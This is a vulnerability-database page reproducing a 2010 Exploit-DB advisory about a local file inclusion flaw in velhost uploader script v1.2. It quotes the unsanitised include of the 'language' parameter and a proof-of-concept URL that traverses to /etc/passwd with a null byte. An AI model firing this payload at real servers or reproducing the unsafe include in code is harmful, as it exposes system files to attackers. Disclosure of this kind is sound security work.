velhost uploader script v1.2 Local File Inclusion Vulnerability

vendor:

velhost uploader script

by:

cr4wl3r

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: velhost uploader script

Affected Version From: v1.2

Affected Version To: v1.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

velhost uploader script v1.2 Local File Inclusion Vulnerability

velhost uploader script v1.2 is vulnerable to Local File Inclusion vulnerability. An attacker can exploit this vulnerability to include arbitrary files from the local system. This vulnerability is caused due to the use of user-supplied input without proper validation. An attacker can exploit this vulnerability by passing malicious input to the 'language' parameter in the 'upload.php' script. This can be exploited to include arbitrary files from the local system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

===============================================================
velhost uploader script v1.2 Local File Inclusion Vulnerability
===============================================================

[+] velhost uploader script v1.2 Local File Inclusion Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: cr4wl3r
[+] Advisories: http://shell4u.oni.cc/home/exploits/velhost.txt
[+] Code [upload.php]

include("./lang/$language.php");

[+] PoC: [path]/pages/upload.php?language=../../../../../etc/passwd%00



# Inj3ct0r.com [2010-04-02]